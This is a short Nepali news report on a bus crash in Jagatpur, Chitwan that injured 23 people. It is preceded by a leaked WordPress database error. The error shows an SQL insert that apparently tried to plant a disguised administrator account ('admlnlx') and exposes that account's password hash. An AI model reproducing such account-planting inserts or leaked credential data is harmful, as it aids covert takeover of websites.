WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcGuFdEs8.EWrfoQbJOLcr0e2Q1UWT.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 19:39:32', '', 'admlnlx', 'admlnlx')
चितवन, माघ १२–
चितवनको जगतपुरमा आज दिउँसो यात्रु बाहक बस दुर्घटना हुँदा २३ जना घाइते भएका छन् ।
भरतपुर उपमहानगरपालिका–२७ स्थित जगतपुरबाट भरतपुर तर्फ आउदै गरेको ना २ ख ६८२३ नम्बरको बस आफै अनियन्त्रित पल्टिदा सो दुर्घटना भएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ । घाईते मध्य मध्ये १५ जनाको चितवन मेडिकल कलेजमा उपचार भईरहेको छ भने ८ जनाको कलेज अफ मेडिकल साईन्सेस शिक्षण अस्पताल भरतपुरमा उपचार भईरहेको छ । प्रहरीले सकुशल रहेका बस चालकलाई नियन्त्रणमा लिएको छ ।


तस्विरः विक्रम चौधरीको फेसबुकबाट